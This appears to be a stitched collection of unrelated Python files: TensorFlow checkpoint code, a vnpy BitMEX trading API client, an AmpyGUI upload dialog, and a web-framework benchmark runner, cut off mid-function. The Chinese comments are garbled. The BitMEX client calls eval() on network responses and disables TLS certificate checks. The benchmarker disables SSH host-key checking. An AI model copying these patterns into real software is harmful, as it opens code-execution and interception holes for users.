"supported by TensorFlow Operations. Consider using "
"tf.train.Checkpoint.write(), a lower-level API which does not "
"update metadata. tf.train.latest_checkpoint and related APIs will "
"not see this checkpoint.")
session = get_session()
if self._save_counter is None:
# When graph building, if this is a new save counter variable then it
# needs to be initialized before assign_add. This is only an issue if
# restore() has not been called first.
session.run(self.save_counter.initializer)
if not graph_building or self._save_assign_op is None:
with ops.colocate_with(self.save_counter):
assign_op = self.save_counter.assign_add(1, read_value=True)
if graph_building:
self._save_assign_op = data_structures.NoDependency(assign_op)
if graph_building:
checkpoint_number = session.run(self._save_assign_op)
else:
checkpoint_number = assign_op.numpy()
file_path = self._write(
"%s-%d" % (file_prefix, checkpoint_number),
options=options,
update_ckpt_state=True)
# Update internal checkpoint state.
if not options.experimental_enable_async_checkpoint:
# For synchronous checkpoint, since SaveOp may be run as in graph/session
# mode, checkpoint state can only be updated once SaveOp is finished by
# TrackableSaver.save().
#
# If async-checkpoint is enabled, since currently only eager mode is
# supported, we can update the checkpoint state in the background as soon
# as the eager SaveOp finishes.
# See TrackableSaver._save_cached_when_graph_building() for more details.
_update_checkpoint_state_internal(file_path)
# Ensure save operations have completed, only when running in eager runtime
# and non-async checkpoint configuration.
if not graph_building and not options.experimental_enable_async_checkpoint:
context.async_wait()
return file_path
def read(self, save_path, options=None):
"""Reads a training checkpoint written with `write`.
Reads this `Checkpoint` and any objects it depends on.
This method is just like `restore()` but does not expect the `save_counter`
variable in the checkpoint. It only restores the objects that the checkpoint
already depends on.
The method is primarily intended for use by higher level checkpoint
management utilities that use `write()` instead of `save()` and have their
own mechanisms to number and track checkpoints.
Example usage:
```python
# Create a checkpoint with write()
ckpt = tf.train.Checkpoint(v=tf.Variable(1.))
path = ckpt.write('/tmp/my_checkpoint')
# Later, load the checkpoint with read()
# With restore() assert_consumed() would have failed.
checkpoint.read(path).assert_consumed()
# You can also pass options to read(). For example this
# runs the IO ops on the localhost:
options = tf.train.CheckpointOptions(
experimental_io_device="/job:localhost")
checkpoint.read(path, options=options)
```
Args:
save_path: The path to the checkpoint as returned by `write`.
options: Optional `tf.train.CheckpointOptions` object.
Returns:
A load status object, which can be used to make assertions about the
status of a checkpoint restoration. See `restore` for details.
"""
start_time = time.time()
if isinstance(save_path, os.PathLike):
save_path = os.fspath(save_path)
options = options or checkpoint_options.CheckpointOptions()
result = self._saver.restore(save_path=save_path, options=options)
metrics.AddCheckpointReadDuration(
api_label=_CHECKPOINT_V2,
microseconds=_get_duration_microseconds(start_time, time.time()))
return result
def restore(self, save_path, options=None):
"""Restores a training checkpoint.
Restores this `Checkpoint` and any objects it depends on.
This method is intended to be used to load checkpoints created by `save()`.
For checkpoints created by `write()` use the `read()` method which does not
expect the `save_counter` variable added by `save()`.
`restore()` either assigns values immediately if variables to restore have
been created already, or defers restoration until the variables are
created. Dependencies added after this call will be matched if they have a
corresponding object in the checkpoint (the restore request will queue in
any trackable object waiting for the expected dependency to be added).
```python
checkpoint = tf.train.Checkpoint( ... )
checkpoint.restore(path)
# You can additionally pass options to restore():
options = tf.CheckpointOptions(experimental_io_device="/job:localhost")
checkpoint.restore(path, options=options)
```
To ensure that loading is complete and no more deferred restorations will
take place, use the `assert_consumed()` method of the status object returned
by `restore()`:
```python
checkpoint.restore(path, options=options).assert_consumed()
```
The assert will raise an error if any Python objects in the dependency graph
were not found in the checkpoint, or if any checkpointed values do not have
a matching Python object.
Name-based `tf.compat.v1.train.Saver` checkpoints from TensorFlow 1.x can be
loaded using this method. Names are used to match variables. Re-encode
name-based checkpoints using `tf.train.Checkpoint.save` as soon as possible.
**Loading from SavedModel checkpoints**
To load values from a SavedModel, just pass the SavedModel directory
to checkpoint.restore:
```python
model = tf.keras.Model(...)
tf.saved_model.save(model, path) # or model.save(path, save_format='tf')
checkpoint = tf.train.Checkpoint(model)
checkpoint.restore(path).expect_partial()
```
This example calls `expect_partial()` on the loaded status, since
SavedModels saved from Keras often generates extra keys in the checkpoint.
Otherwise, the program prints a lot of warnings about unused keys at exit
time.
Args:
save_path: The path to the checkpoint, as returned by `save` or
`tf.train.latest_checkpoint`. If the checkpoint was written by the
name-based `tf.compat.v1.train.Saver`, names are used to match
variables. This path may also be a SavedModel directory.
options: Optional `tf.train.CheckpointOptions` object.
Returns:
A load status object, which can be used to make assertions about the
status of a checkpoint restoration.
The returned status object has the following methods:
* `assert_consumed()`:
Raises an exception if any variables are unmatched: either
checkpointed values which don't have a matching Python object or
Python objects in the dependency graph with no values in the
checkpoint. This method returns the status object, and so may be
chained with other assertions.
* `assert_existing_objects_matched()`:
Raises an exception if any existing Python objects in the dependency
graph are unmatched. Unlike `assert_consumed`, this assertion will
pass if values in the checkpoint have no corresponding Python
objects. For example a `tf.keras.Layer` object which has not yet been
built, and so has not created any variables, will pass this assertion
but fail `assert_consumed`. Useful when loading part of a larger
checkpoint into a new Python program, e.g. a training checkpoint with
a `tf.compat.v1.train.Optimizer` was saved but only the state required
for
inference is being loaded. This method returns the status object, and
so may be chained with other assertions.
* `assert_nontrivial_match()`: Asserts that something aside from the root
object was matched. This is a very weak assertion, but is useful for
sanity checking in library code where objects may exist in the
checkpoint which haven't been created in Python and some Python
objects may not have a checkpointed value.
* `expect_partial()`: Silence warnings about incomplete checkpoint
restores. Warnings are otherwise printed for unused parts of the
checkpoint file or object when the `Checkpoint` object is deleted
(often at program shutdown).
Raises:
NotFoundError: if the a checkpoint or SavedModel cannot be found at
`save_path`.
"""
orig_save_path = save_path
if isinstance(save_path, os.PathLike):
save_path = os.fspath(save_path)
if save_path is not None and gfile.IsDirectory(save_path) and (
(gfile.Exists(utils_impl.get_saved_model_pb_path(save_path)) or
gfile.Exists(utils_impl.get_saved_model_pbtxt_path(save_path)))):
save_path = utils_impl.get_variables_path(save_path)
try:
status = self.read(save_path, options=options)
if context.executing_eagerly():
context.async_wait() # Ensure restore operations have completed.
except errors_impl.NotFoundError as e:
raise errors_impl.NotFoundError(
None, None,
f"Error when restoring from checkpoint or SavedModel at "
f"{orig_save_path}: {e.message}"
f"\nPlease double-check that the path is correct. You may be missing "
"the checkpoint suffix (e.g. the '-1' in 'path/to/ckpt-1').")
# Create the save counter now so it gets initialized with other variables
# when graph building. Creating it earlier would lead to errors when using,
# say, train.Saver() to save the model before initializing it.
self._maybe_create_save_counter()
if isinstance(status, NameBasedSaverStatus):
status.add_to_optionally_restored(self.save_counter)
return status
|
vnbitmex.py
|
# encoding: UTF-8
from __future__ import print_function
import hashlib
import json
import ssl
import traceback
from copy import copy
from threading import Thread, Event, Timer, current_thread
from queue import Queue, Empty
from multiprocessing.dummy import Pool
from time import time, sleep
from datetime import datetime,timedelta
from functools import partial
import requests
import websocket
import pandas as pd
from six.moves.urllib.parse import urlparse, urlencode
from six.moves import input
from vnpy.api.bitmex.utils import hmac_new
REST_HOST = 'https://www.bitmex.com/api/v1'
WEBSOCKET_HOST = 'wss://www.bitmex.com/realtime'
TESTNET_REST_HOST = "https://testnet.bitmex.com/api/v1"
TESTNET_WEBSOCKET_HOST = "wss://testnet.bitmex.com/realtime"
########################################################################
class BitmexRestApi(object):
"""REST API"""
#----------------------------------------------------------------------
def __init__(self, testnet=False):
"""Constructor"""
self.apiKey = ''
self.apiSecret = ''
self.testnet = testnet
self.active = False
self.reqid = 0
self.queue = Queue()
self.pool = None
self.sessionDict = {} # ไผ่ฏๅฏน่ฑกๅญๅ
ธ
self.header = {
'Content-Type': 'application/x-www-form-urlencoded',
'Accept': 'application/json'
}
#----------------------------------------------------------------------
def init(self, apiKey, apiSecret):
"""ๅๅงๅ"""
self.apiKey = apiKey
self.apiSecret = apiSecret
#----------------------------------------------------------------------
def start(self, n=3):
"""ๅฏๅจ"""
if self.active:
return
self.active = True
self.pool = Pool(n)
self.pool.map_async(self.run, range(n))
#----------------------------------------------------------------------
def close(self):
"""ๅ
ณ้ญ"""
self.active = False
if self.pool:
self.pool.close()
self.pool.join()
#----------------------------------------------------------------------
def addReq(self, method, path, callback, on_error=None, params=None, postdict=None):
"""ๆทปๅ ่ฏทๆฑ"""
self.reqid += 1
req = (method, path, callback, on_error, params, postdict, self.reqid)
self.queue.put(req)
return self.reqid
@staticmethod
def _set_fut_result(fut, rep, exception=None):
try:
if exception:
fut.set_exception(exception)
else:
fut.set_result(rep)
except Exception as e:
fut.set_exception(e)
def blockReq(self, method, path, params=None, postdict=None, timeout=60):
def on_rep(fut, data, reqid):
self._set_fut_result(fut, data)
def on_error(fut, code, data, reqid):
e = HTTPError()
e.code = code
e.reason = data
self._set_fut_result(fut, None, exception=e)
fut = Future()
self.addReq(
method, path,
partial(on_rep, fut), on_error=partial(on_error, fut),
params=params, postdict=postdict)
rep = fut.result(timeout=timeout) # default timeout 60 seconds.
return rep
#----------------------------------------------------------------------
def processReq(self, req, i):
"""ๅค็่ฏทๆฑ"""
method, path, callback, on_error, params, postdict, reqid = req
url = (TESTNET_REST_HOST if self.testnet else REST_HOST) + path
expires = int(time() + 5)
rq = requests.Request(url=url, data=postdict)
p = rq.prepare()
header = copy(self.header)
header['api-expires'] = str(expires)
header['api-key'] = self.apiKey
header['api-signature'] = self.generateSignature(method, path, expires, params, body=p.body)
# ไฝฟ็จ้ฟ่ฟๆฅ็session๏ผๆฏ็ญ่ฟๆฅ็่ๆถ็ผฉ็ญ80%
session = self.sessionDict[i]
resp = session.request(method, url, headers=header, params=params, data=postdict)
#resp = requests.request(method, url, headers=header, params=params, data=postdict)
code = resp.status_code
d = resp.json()
print(code, d)
if code == 200:
callback(d, reqid)
else:
if on_error:
on_error(code, d, reqid)
else:
self.onError(code, d, reqid)
#----------------------------------------------------------------------
def run(self, i):
"""่ฟ็ปญ่ฟ่ก"""
self.sessionDict[i] = requests.Session()
while self.active:
try:
req = self.queue.get(timeout=1)
self.processReq(req, i)
except Empty:
pass
#----------------------------------------------------------------------
def generateSignature(self, method, path, expires, params=None, body=None):
"""็ๆ็ญพๅ"""
# ๅฏนparamsๅจHTTPๆฅๆ่ทฏๅพไธญ๏ผไปฅ่ฏทๆฑๅญๆฎตๆนๅผๅบๅๅ
if params:
query = urlencode(sorted(params.items()))
path = path + '?' + query
if body is None:
body = ''
msg = method + '/api/v1' + path + str(expires) + body
signature = hmac_new(self.apiSecret, msg,
digestmod=hashlib.sha256).hexdigest()
return signature
#----------------------------------------------------------------------
def onError(self, code, error, reqid):
"""้่ฏฏๅ่ฐ"""
print('on error')
print(code, error)
#----------------------------------------------------------------------
def onData(self, data, reqid):
"""้็จๅ่ฐ"""
print('on data')
print(data, reqid)
def restKline(self,symbol, type_, size, since = None):
params = {"symbol":symbol,"binSize":type_,"count":size,"reverse":True}
url = REST_HOST + "/" + "trade/bucketed"
data = requests.get(url, headers=self.header, params = params,timeout=10)
# print(data.json())
null =0
text = eval(data.text)
# df = pd.DataFrame(text, columns=["datetime", "open", "high", "low", "close", "volume","%s_volume"%symbol])
df = pd.DataFrame(text, columns=["timestamp","symbol", "open", "high", "low", "close", "trades","volume","vwap","lastSize","turnover","homeNotional","foreignNotional"])
df["datetime"] = df["timestamp"].map(
lambda x: x.replace('-','').replace('T',' ').replace('.000Z',''))
delta = timedelta(hours=8)
df["datetime"] = df["datetime"].map(
lambda x: datetime.strptime(x,"%Y%m%d %H:%M:%S")+delta) # ๅฆๆๆๅกๅจๆๆถๅบๅทฎๅซ
df["open"] = df["open"].map(
lambda x: float(x))
df["high"] = df["high"].map(
lambda x: float(x))
df["low"] = df["low"].map(
lambda x: float(x))
df["close"] = df["close"].map(
lambda x: float(x))
df["volume"] = df["volume"].map(
lambda x: float(x))
df.sort_values(by = ['datetime'], ascending=True, inplace=True)
print(df['datetime'],df['open'])
print(df.to_dict())
return df.to_dict()
########################################################################
class BitmexWebsocketApi(object):
"""Websocket API"""
#----------------------------------------------------------------------
def __init__(self, testnet=False):
"""Constructor"""
self.ws = None
self.thread = None
self.active = False
self.testnet = testnet
def get_host(self):
return TESTNET_WEBSOCKET_HOST if self.testnet else WEBSOCKET_HOST
#----------------------------------------------------------------------
def start(self):
"""ๅฏๅจ"""
self.ws = websocket.create_connection(self.get_host(),
sslopt={'cert_reqs': ssl.CERT_NONE})
self.active = True
self.thread = Thread(target=self.run)
self.thread.start()
self.onConnect()
#----------------------------------------------------------------------
def reconnect(self):
"""้่ฟ"""
self.ws = websocket.create_connection(self.get_host(),
sslopt={'cert_reqs': ssl.CERT_NONE})
self.onConnect()
#----------------------------------------------------------------------
def run(self):
"""่ฟ่ก"""
while self.active:
try:
stream = self.ws.recv()
data = json.loads(stream)
self.onData(data)
except:
msg = traceback.format_exc()
self.onError(msg)
self.reconnect()
#----------------------------------------------------------------------
def close(self):
"""ๅ
ณ้ญ"""
self.active = False
if self.thread:
self.thread.join()
#----------------------------------------------------------------------
def onConnect(self):
"""่ฟๆฅๅ่ฐ"""
print('connected')
#----------------------------------------------------------------------
def onData(self, data):
"""ๆฐๆฎๅ่ฐ"""
print('-' * 30)
l = data.keys()
l.sort()
for k in l:
print(k, data[k])
#----------------------------------------------------------------------
def onError(self, msg):
"""้่ฏฏๅ่ฐ"""
print(msg)
#----------------------------------------------------------------------
def sendReq(self, req):
"""ๅๅบ่ฏทๆฑ"""
self.ws.send(json.dumps(req))
class BitmexWebsocketApiWithHeartbeat(object):
HEARTBEAT_INTERVAL = 5
HEARTBEAT_TIMEOUT = 10
RECONNECT_TIMEOUT = 5
def __init__(self, testnet=False):
"""Constructor"""
self.ws = None
self.wsThread = None
self.active = False
self.testnet = testnet
self.heartbeatCount = 0
self.heartbeatCheckCount = 0
self.heartbeatThread = None
self.heartbeatReceived = True
self.connectEvent = Event()
self.reconnecting = False
self.reconnectTimer = None
def get_host(self):
return TESTNET_WEBSOCKET_HOST if self.testnet else WEBSOCKET_HOST
def start(self, trace=False):
"""่ฟๆฅ"""
websocket.enableTrace(trace)
self.initWebsocket()
self.active = True
self.heartbeatReceived = True
def initWebsocket(self):
""""""
self.ws = websocket.WebSocketApp(self.get_host(),
on_message=self.onMessageCallback,
on_error=self.onErrorCallback,
on_close=self.onCloseCallback,
on_open=self.onOpenCallback,
)
self.wsThread = Thread(target=self.ws.run_forever, kwargs=dict(
sslopt = {"cert_reqs": ssl.CERT_NONE, "check_hostname": False},
))
self.wsThread.start()
def doHeartbeat(self):
d = "ping"
self.ws.send(d)
def heartbeat(self):
while self.active:
self.connectEvent.wait()
self.heartbeatCount += 1
self.heartbeatCheckCount += 1
if self.heartbeatCount >= self.HEARTBEAT_INTERVAL:
self.heartbeatCount = 0
try:
self.doHeartbeat()
except:
msg = traceback.format_exc()
self.onError(msg)
self.reconnect()
if self.heartbeatCheckCount >= self.HEARTBEAT_TIMEOUT:
self.heartbeatCheckCount = 0
if not self.heartbeatReceived:
self.reconnect()
else:
self.heartbeatReceived = False
sleep(1)
def reconnect(self):
"""้ๆฐ่ฟๆฅ"""
if not self.reconnecting:
self.reconnecting = True
self.closeWebsocket() # ้ฆๅ
ๅ
ณ้ญไนๅ็่ฟๆฅ
# print('APIๆญ็บฟ้่ฟ')
self.reconnectTimer = Timer(self.RECONNECT_TIMEOUT, self.connectEvent.set)
self.connectEvent.clear() # ่ฎพ็ฝฎๆช่ฟๆฅไธ
self.initWebsocket()
self.reconnectTimer.start()
self.heartbeatReceived = True # avoid too frequent reconnect
self.reconnecting = False
def closeHeartbeat(self):
"""ๅ
ณ้ญๆฅๅฃ"""
if self.heartbeatThread and self.heartbeatThread.isAlive():
self.active = False
self.heartbeatThread.join()
self.heartbeatThread = None
def closeWebsocket(self):
"""ๅ
ณ้ญWS"""
if self.wsThread and self.wsThread.isAlive():
self.ws.close()
if current_thread() != self.wsThread:
self.wsThread.join(2)
def close(self):
""""""
self.closeHeartbeat()
self.closeWebsocket()
def readData(self, evt):
"""่งฃ็ ๆจ้ๆถๅฐ็ๆฐๆฎ"""
data = json.loads(evt)
return data
def onMessageCallback(self, ws, evt):
""""""
self.heartbeatReceived = True
if evt != "pong":
data = self.readData(evt)
self.onData(data)
#----------------------------------------------------------------------
def onErrorCallback(self, ws, evt):
""""""
if isinstance(evt, Exception):
msg = traceback.format_exc()
else:
msg = str(evt)
self.onError(msg)
#----------------------------------------------------------------------
def onCloseCallback(self, ws):
""""""
self.onClose()
#----------------------------------------------------------------------
def onOpenCallback(self, ws):
""""""
self.connectEvent.set() # ่ฎพ็ฝฎไธบ่ฟๆฅไธ
if self.reconnectTimer:
self.reconnectTimer.cancel()
self.heartbeatReceived = True
if not self.heartbeatThread:
self.heartbeatThread = Thread(target=self.heartbeat)
self.heartbeatThread.start()
self.onConnect()
def onData(self, data):
"""ไฟกๆฏๆจ้"""
print('onData')
def onError(self, data):
"""้่ฏฏๆจ้"""
print('onError')
def onClose(self):
"""ๆฅๅฃๆญๅผ"""
print('onClose')
def onConnect(self):
"""ๆฅๅฃๆๅผ"""
print('onConnect')
def sendReq(self, req):
"""ๅๅบ่ฏทๆฑ"""
self.ws.send(json.dumps(req))
if __name__ == '__main__':
API_KEY = ''
API_SECRET = ''
## RESTๆต่ฏ
rest = BitmexRestApi()
rest.init(API_KEY, API_SECRET)
rest.start(3)
data = {
'symbol': 'XBTUSD'
}
rest.addReq('POST', '/position/isolate', rest.onData, postdict=data)
#rest.addReq('GET', '/instrument', rest.onData)
# WEBSOCKETๆต่ฏ
#ws = BitmexWebsocketApi()
#ws.start()
#req = {"op": "subscribe", "args": ['order', 'trade', 'position', 'margin']}
#ws.sendReq(req)
#expires = int(time())
#method = 'GET'
#path = '/realtime'
#msg = method + path + str(expires)
#signature = hmac_new(API_SECRET, msg, digestmod=hashlib.sha256).hexdigest()
#req = {
#'op': 'authKey',
#'args': [API_KEY, expires, signature]
#}
#ws.sendReq(req)
#req = {"op": "subscribe", "args": ['order', 'execution', 'position', 'margin']}
#req = {"op": "subscribe", "args": ['instrument']}
#ws.sendReq(req)
input()
|
put_files.py
|
from tkinter import *
from tkinter import ttk
from tkinter import filedialog
from distutils import dir_util
from data.loading import Loading
# from data import mpy_cross
import os
import ampy.pyboard
import threading
import shutil
import mpy_cross
class PutFiles(Toplevel):
def __init__(self, parent, mpy=False):
super(PutFiles, self).__init__()
self.parent = parent
self.transient(self.parent)
self.mpy = mpy
width = 200
height = 100
pos_x = self.parent.winfo_x() + (self.parent.winfo_width() // 2) - (width // 2)
pos_y = self.parent.winfo_y() + (self.parent.winfo_height() // 2) - (height // 2)
self.geometry(f"{width}x{height}+{pos_x}+{pos_y}")
self.resizable(False, False)
self.title("Put..." if not self.mpy else "Put MPY...")
if sys.platform == "win32":
self.iconbitmap("data/AmpyGUI_icon.ico")
elif sys.platform == "linux":
self.icon = Image("photo", file="data/AmpyGUI_icon.png")
self.tk.call("wm", "iconphoto", self._w, self.icon)
ttk.Button(self, text="Put folder", takefocus=0, command=self.folder).pack(expand=YES, fill=BOTH, padx=5, pady=4)
ttk.Button(self, text="Put files", takefocus=0, command=self.files).pack(expand=YES, fill=BOTH, padx=5, pady=4)
self.focus_set()
self.grab_set()
@staticmethod
def convert_to_mpy():
for root, dirs, files in os.walk("MPY"):
root = root.replace("\\", "/")
for file in files:
if ".py" == file[-3:] and file != "main.py":
py_path = root + "/" + file
mpy_cross.run(py_path).wait()
os.remove(py_path)
def folder(self):
def folder_thread():
try:
if self.mpy:
# Compile python files to mpy.
if os.path.exists("MPY"):
shutil.rmtree("MPY")
dir_util._path_created = {}
dir_util.copy_tree(folder, "MPY")
self.convert_to_mpy()
directories = list()
for root, dirs, files in os.walk(folder if not self.mpy else "MPY"):
relative_path = root.replace(folder if not self.mpy else "MPY", "").replace("\\", "/")
# Directories with '.' are ignored.
if "." in relative_path:
continue
if relative_path != "" and path[:-1] + relative_path not in directories:
self.parent.files.mkdir(path[:-1] + relative_path, exists_okay=True)
directories.append(path[:-1] + relative_path)
for file in files:
with open(root + "/" + file, "rb") as data:
self.parent.files.put(path[:-1] + relative_path + "/" + file, data.read())
if self.mpy:
shutil.rmtree("MPY")
self.parent.refresh()
except (Exception, ampy.pyboard.PyboardError) as e:
self.parent.show_error(e)
loading.close()
path = self.parent.get_path()
folder = filedialog.askdirectory()
if folder != "":
loading = Loading(self.parent, title="Uploading")
threading.Thread(target=folder_thread).start()
self.destroy()
def files(self):
def files_thread():
try:
if self.mpy:
# Compile python files to mpy.
if os.path.exists("MPY"):
shutil.rmtree("MPY")
os.mkdir("MPY")
for file in files:
shutil.copy2(file.name, "MPY/" + file.name.split("/")[-1])
self.convert_to_mpy()
for file in os.listdir("MPY"):
with open("MPY/" + file, "rb") as data:
self.parent.files.put(path + file, data.read())
else:
for file in files:
with open(file.name, "rb") as data:
self.parent.files.put(path + file.name.split("/")[-1], data.read())
if self.mpy:
shutil.rmtree("MPY")
self.parent.refresh()
except (Exception, ampy.pyboard.PyboardError) as e:
self.parent.show_error(e)
loading.close()
path = self.parent.get_path()
files = filedialog.askopenfiles()
if files != "":
loading = Loading(self.parent, title="Uploading")
threading.Thread(target=files_thread).start()
self.destroy()
|
benchmarker.py
|
from setup.linux.installer import Installer
from setup.linux import setup_util
from benchmark import framework_test
from benchmark.test_types import *
from utils import header
from utils import gather_tests
from utils import gather_frameworks
import os
import json
import subprocess
import traceback
import time
import pprint
import csv
import sys
import logging
import socket
import threading
import textwrap
from pprint import pprint
from multiprocessing import Process
from datetime import datetime
# Cross-platform colored text
from colorama import Fore, Back, Style
# Text-based progress indicators
import progressbar
class Benchmarker:
##########################################################################################
# Public methods
##########################################################################################
############################################################
# Prints all the available tests
############################################################
def run_list_tests(self):
all_tests = self.__gather_tests
for test in all_tests:
print test.name
self.__finish()
############################################################
# End run_list_tests
############################################################
############################################################
# Prints the metadata for all the available tests
############################################################
def run_list_test_metadata(self):
all_tests = self.__gather_tests
all_tests_json = json.dumps(map(lambda test: {
"name": test.name,
"approach": test.approach,
"classification": test.classification,
"database": test.database,
"framework": test.framework,
"language": test.language,
"orm": test.orm,
"platform": test.platform,
"webserver": test.webserver,
"os": test.os,
"database_os": test.database_os,
"display_name": test.display_name,
"notes": test.notes,
"versus": test.versus
}, all_tests))
with open(os.path.join(self.full_results_directory(), "test_metadata.json"), "w") as f:
f.write(all_tests_json)
self.__finish()
############################################################
# End run_list_test_metadata
############################################################
############################################################
# parse_timestamp
# Re-parses the raw data for a given timestamp
############################################################
def parse_timestamp(self):
all_tests = self.__gather_tests
for test in all_tests:
test.parse_all()
self.__parse_results(all_tests)
self.__finish()
############################################################
# End parse_timestamp
############################################################
############################################################
# Run the tests:
# This process involves setting up the client/server machines
# with any necessary change. Then going through each test,
# running their setup script, verifying the URLs, and
# running benchmarks against them.
############################################################
def run(self):
##########################
# Get a list of all known
# tests that we can run.
##########################
all_tests = self.__gather_tests
##########################
# Setup client/server
##########################
print header("Preparing Server, Database, and Client ...", top='=', bottom='=')
self.__setup_server()
self.__setup_database()
self.__setup_client()
## Check if wrk (and wrk-pipeline) is installed and executable, if not, raise an exception
#if not (os.access("/usr/local/bin/wrk", os.X_OK) and os.access("/usr/local/bin/wrk-pipeline", os.X_OK)):
# raise Exception("wrk and/or wrk-pipeline are not properly installed. Not running tests.")
##########################
# Run tests
##########################
print header("Running Tests...", top='=', bottom='=')
result = self.__run_tests(all_tests)
##########################
# Parse results
##########################
if self.mode == "benchmark":
print header("Parsing Results ...", top='=', bottom='=')
self.__parse_results(all_tests)
self.__finish()
return result
############################################################
# End run
############################################################
############################################################
# database_sftp_string(batch_file)
# generates a fully qualified URL for sftp to database
############################################################
def database_sftp_string(self, batch_file):
sftp_string = "sftp -oStrictHostKeyChecking=no "
if batch_file != None: sftp_string += " -b " + batch_file + " "
if self.database_identity_file != None:
sftp_string += " -i " + self.database_identity_file + " "
return sftp_string + self.database_user + "@" + self.database_host
############################################################
# End database_sftp_string
############################################################
############################################################
# client_sftp_string(batch_file)
# generates a fully qualified URL for sftp to client
############################################################
def client_sftp_string(self, batch_file):
sftp_string = "sftp -oStrictHostKeyChecking=no "
if batch_file != None: sftp_string += " -b " + batch_file + " "
if self.client_identity_file != None:
sftp_string += " -i " + self.client_identity_file + " "
return sftp_string + self.client_user + "@" + self.client_host
############################################################
# End client_sftp_string
############################################################
############################################################
# generate_url(url, port)
# generates a fully qualified URL for accessing a test url
############################################################
def generate_url(self, url, port):
return self.server_host + ":" + str(port) + url
############################################################
# End generate_url
############################################################
############################################################
# get_output_file(test_name, test_type)
# returns the output file name for this test_name and
# test_type timestamp/test_type/test_name/raw
############################################################
def get_output_file(self, test_name, test_type):
return os.path.join(self.result_directory, self.timestamp, test_type, test_name, "raw")
############################################################
# End get_output_file
############################################################
############################################################
# output_file(test_name, test_type)
# returns the output file for this test_name and test_type
# timestamp/test_type/test_name/raw
############################################################
def output_file(self, test_name, test_type):
path = self.get_output_file(test_name, test_type)
try:
os.makedirs(os.path.dirname(path))
except OSError:
pass
return path
############################################################
# End output_file
############################################################
############################################################
# get_stats_file(test_name, test_type)
# returns the stats file name for this test_name and
# test_type timestamp/test_type/test_name/raw
############################################################
def get_stats_file(self, test_name, test_type):
return os.path.join(self.result_directory, self.timestamp, test_type, test_name, "stats")
############################################################
# End get_stats_file
############################################################
############################################################
# stats_file(test_name, test_type)
# returns the stats file for this test_name and test_type
# timestamp/test_type/test_name/raw
############################################################
def stats_file(self, test_name, test_type):
path = self.get_stats_file(test_name, test_type)
try:
os.makedirs(os.path.dirname(path))
except OSError:
pass
return path
############################################################
# End stats_file
############################################################
############################################################
# full_results_directory
############################################################
def full_results_directory(self):
path = os.path.join(self.result_directory, self.timestamp)
try:
os.makedirs(path)
except OSError:
pass
return path
############################################################
# End full_results_directory
############################################################
############################################################
# Latest intermediate results dirctory
############################################################
def latest_results_directory(self):
path = os.path.join(self.result_directory,"latest")
try:
os.makedirs(path)
except OSError:
pass
return path
############################################################
# report_verify_results
# Used by FrameworkTest to add verification details to our results
#
# TODO: Technically this is an IPC violation - we are accessing
# the parent process' memory from the child process
############################################################
def report_verify_results(self, framework, test, result):
if framework.name not in self.results['verify'].keys():
self.results['verify'][framework.name] = dict()
self.results['verify'][framework.name][test] = result
############################################################
# report_benchmark_results
# Used by FrameworkTest to add benchmark data to this
#
# TODO: Technically this is an IPC violation - we are accessing
# the parent process' memory from the child process
############################################################
def report_benchmark_results(self, framework, test, results):
if test not in self.results['rawData'].keys():
self.results['rawData'][test] = dict()
# If results has a size from the parse, then it succeeded.
if results:
self.results['rawData'][test][framework.name] = results
# This may already be set for single-tests
if framework.name not in self.results['succeeded'][test]:
self.results['succeeded'][test].append(framework.name)
else:
# This may already be set for single-tests
if framework.name not in self.results['failed'][test]:
self.results['failed'][test].append(framework.name)
############################################################
# End report_results
############################################################
##########################################################################################
# Private methods
##########################################################################################
############################################################
# Gathers all the tests
############################################################
@property
def __gather_tests(self):
tests = gather_tests(include=self.test,
exclude=self.exclude,
benchmarker=self)
# If the tests have been interrupted somehow, then we want to resume them where we left
# off, rather than starting from the beginning
if os.path.isfile('current_benchmark.txt'):
with open('current_benchmark.txt', 'r') as interrupted_benchmark:
interrupt_bench = interrupted_benchmark.read().strip()
for index, atest in enumerate(tests):
if atest.name == interrupt_bench:
tests = tests[index:]
break
return tests
############################################################
# End __gather_tests
############################################################
############################################################
# Makes any necessary changes to the server that should be
# made before running the tests. This involves setting kernal
# settings to allow for more connections, or more file
# descriptiors
#
# http://redmine.lighttpd.net/projects/weighttp/wiki#Troubleshooting
############################################################
def __setup_server(self):
try:
if os.name == 'nt':
return True
subprocess.check_call(["sudo","bash","-c","cd /sys/devices/system/cpu; ls -d cpu[0-9]*|while read x; do echo performance > $x/cpufreq/scaling_governor; done"])
subprocess.check_call("sudo sysctl -w net.ipv4.tcp_max_syn_backlog=65535".rsplit(" "))
subprocess.check_call("sudo sysctl -w net.core.somaxconn=65535".rsplit(" "))
subprocess.check_call("sudo -s ulimit -n 65535".rsplit(" "))
subprocess.check_call("sudo sysctl net.ipv4.tcp_tw_reuse=1".rsplit(" "))
subprocess.check_call("sudo sysctl net.ipv4.tcp_tw_recycle=1".rsplit(" "))
subprocess.check_call("sudo sysctl -w kernel.shmmax=134217728".rsplit(" "))
subprocess.check_call("sudo sysctl -w kernel.shmall=2097152".rsplit(" "))
except subprocess.CalledProcessError:
return False
############################################################
# End __setup_server
############################################################
############################################################
# Makes any necessary changes to the database machine that
# should be made before running the tests. Is very similar
# to the server setup, but may also include database specific
# changes.
############################################################
def __setup_database(self):
p = subprocess.Popen(self.database_ssh_string, stdin=subprocess.PIPE, shell=True)
p.communicate("""
sudo sysctl -w net.ipv4.tcp_max_syn_backlog=65535
sudo sysctl -w net.core.somaxconn=65535
sudo -s ulimit -n 65535
sudo sysctl net.ipv4.tcp_tw_reuse=1
sudo sysctl net.ipv4.tcp_tw_recycle=1
sudo sysctl -w kernel.shmmax=2147483648
sudo sysctl -w kernel.shmall=2097152
""")
############################################################
# End __setup_database
############################################################
############################################################
# Makes any necessary changes to the client machine that
# should be made before running the tests. Is very similar
# to the server setup, but may also include client specific
# changes.
############################################################
def __setup_client(self):
p = subprocess.Popen(self.client_ssh_string, stdin=subprocess.PIPE, shell=True)
p.communicate("""
sudo sysctl -w net.ipv4.tcp_max_syn_backlog=65535
sudo sysctl -w net.core.somaxconn=65535
sudo -s ulimit -n 65535
sudo sysctl net.ipv4.tcp_tw_reuse=1
sudo sysctl net.ipv4.tcp_tw_recycle=1
sudo sysctl -w kernel.shmmax=2147483648
sudo sysctl -w kernel.shmall=2097152
""")
############################################################
# End __setup_client
############################################################
############################################################
# __run_tests
#
# 2013-10-02 ASB Calls each test passed in tests to
# __run_test in a separate process. Each
# test is given a set amount of time and if
# kills the child process (and subsequently
# all of its child processes). Uses
# multiprocessing module.
############################################################
def __run_tests(self, tests):
if len(tests) == 0:
return 0
